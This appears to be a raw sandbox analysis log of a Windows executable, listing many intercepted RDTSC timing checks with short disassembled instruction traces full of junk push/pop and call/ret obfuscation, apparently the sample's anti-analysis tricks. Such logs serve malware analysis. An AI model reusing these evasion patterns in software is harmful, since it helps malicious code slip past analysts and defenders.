Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787E6C second address: 787EBE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F28C4758076h 0x00000008 jmp 00007F28C4758084h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 jmp 00007F28C4758086h 0x00000017 js 00007F28C4758076h 0x0000001d pop eax 0x0000001e jg 00007F28C4758084h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 jmp 00007F28C475807Ch 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 787EBE second address: 787ECB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F28C47EE2B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78801E second address: 788036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758084h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B0B2 second address: 78B0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B52A second address: 78B530 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B530 second address: 78B534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BB9F second address: 78BBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BBA3 second address: 78BBA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC2E second address: 78BC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758084h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC4C second address: 78BC53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC53 second address: 78BC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F28C4758078h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F28C4758089h 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6DB second address: 78C6E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6E0 second address: 78C6F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F28C4758076h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C6F4 second address: 78C6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E317 second address: 78E31B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E31B second address: 78E321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DAC2 second address: 78DACC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E321 second address: 78E347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F28C47EE2B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E347 second address: 78E3C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F28C4758078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov di, D7C9h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F28C4758078h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 xor edi, dword ptr [ebp+122D186Eh] 0x0000004c mov dword ptr [ebp+122D339Dh], ecx 0x00000052 xchg eax, ebx 0x00000053 jc 00007F28C4758080h 0x00000059 pushad 0x0000005a pushad 0x0000005b popad 0x0000005c je 00007F28C4758076h 0x00000062 popad 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushad 0x00000068 popad 0x00000069 push edi 0x0000006a pop edi 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E3C8 second address: 78E3CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 790545 second address: 790549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79100B second address: 791016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F28C47EE2B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 791016 second address: 79102C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F28C4758094h 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F28C4758076h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7942DB second address: 7942EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7942EC second address: 7942F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7948A7 second address: 7948AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795973 second address: 795979 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795979 second address: 795A05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F28C47EE2B8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F28C47EE2B8h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 add bx, C784h 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F28C47EE2B8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 00000015h 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 mov edi, 19B094FCh 0x00000068 sub dword ptr [ebp+124770D7h], ebx 0x0000006e xchg eax, esi 0x0000006f push eax 0x00000070 push edx 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 795A05 second address: 795A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 797908 second address: 797992 instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F28C47EE2BFh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F28C47EE2B8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007F28C47EE2C1h 0x00000031 push 00000000h 0x00000033 and ebx, 0D27BD1Ah 0x00000039 mov dword ptr [ebp+122D2EAFh], edx 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007F28C47EE2B8h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 00000018h 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b mov dword ptr [ebp+12451D91h], eax 0x00000061 push eax 0x00000062 pushad 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 797992 second address: 797996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798966 second address: 79896A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7936DC second address: 7936E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7949EC second address: 7949FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79AA62 second address: 79AABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F28C4758078h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub ebx, dword ptr [ebp+122D29B2h] 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D2B4Bh], ebx 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 pushad 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007F28C4758086h 0x0000003c popad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79AABE second address: 79AAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BA02 second address: 79BA29 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F28C4758099h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F28C4758087h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BA29 second address: 79BA2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 796AA2 second address: 796AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 796AA6 second address: 796AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BB61 second address: 79BB6B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8D2 second address: 79D8D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79BB6B second address: 79BB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8D7 second address: 79D8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79D8DD second address: 79D8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79E91B second address: 79E925 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79E925 second address: 79E9A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007F28C4758089h 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F28C4758078h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D26DFh], eax 0x00000032 push eax 0x00000033 movsx ebx, si 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 mov bx, si 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+124513BEh], ecx 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 push edx 0x00000048 pop edx 0x00000049 pop edx 0x0000004a pop eax 0x0000004b push eax 0x0000004c pushad 0x0000004d jmp 00007F28C4758081h 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA64 second address: 79DA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA68 second address: 79DA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79DA6C second address: 79DA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C9h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79CB01 second address: 79CB08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79CB08 second address: 79CB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79F8EE second address: 79F8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A086B second address: 7A086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A086F second address: 7A0873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0873 second address: 7A0879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0879 second address: 7A0883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F28C4758076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0883 second address: 7A08A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F28C47EE2C1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A0A6E second address: 7A0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A4AB0 second address: 7A4AE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F28C47EE2C0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F28C47EE2C3h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 ja 00007F28C47EE2B6h 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A4AE4 second address: 7A4AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50CC second address: 7A50D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50D0 second address: 7A50D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A50D4 second address: 7A515E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 call 00007F28C47EE2BBh 0x0000000e call 00007F28C47EE2C5h 0x00000013 jmp 00007F28C47EE2C7h 0x00000018 pop ebx 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c sub ebx, dword ptr [ebp+122D291Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F28C47EE2B8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e movsx edi, ax 0x00000041 xchg eax, esi 0x00000042 jno 00007F28C47EE2BEh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A515E second address: 7A5162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A5162 second address: 7A516C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A516C second address: 7A5172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AEFE3 second address: 7AEFE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AEFE9 second address: 7AEFF3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF145 second address: 7AF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 jmp 00007F28C47EE2C2h 0x00000017 pop ecx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF2E5 second address: 7AF2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7AF416 second address: 7AF422 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AA7 second address: 7B2AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AB3 second address: 7B2AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AC0 second address: 7B2AD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F28C4758078h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2AD3 second address: 7B2AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2BEF second address: 7B2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758082h 0x00000009 popad 0x0000000a jns 00007F28C475807Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 jmp 00007F28C4758081h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B2C2C second address: 7B2C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F28C47EE2B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 743653 second address: 743665 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F28C475807Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 743665 second address: 743676 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F28C47EE2B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c push edi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8BD3 second address: 7B8BE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F28C4758076h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9150 second address: 7B9154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9154 second address: 7B915E instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C4758076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B915E second address: 7B9199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F28C47EE2C2h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F28C47EE2C8h 0x00000013 popad 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9199 second address: 7B919F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
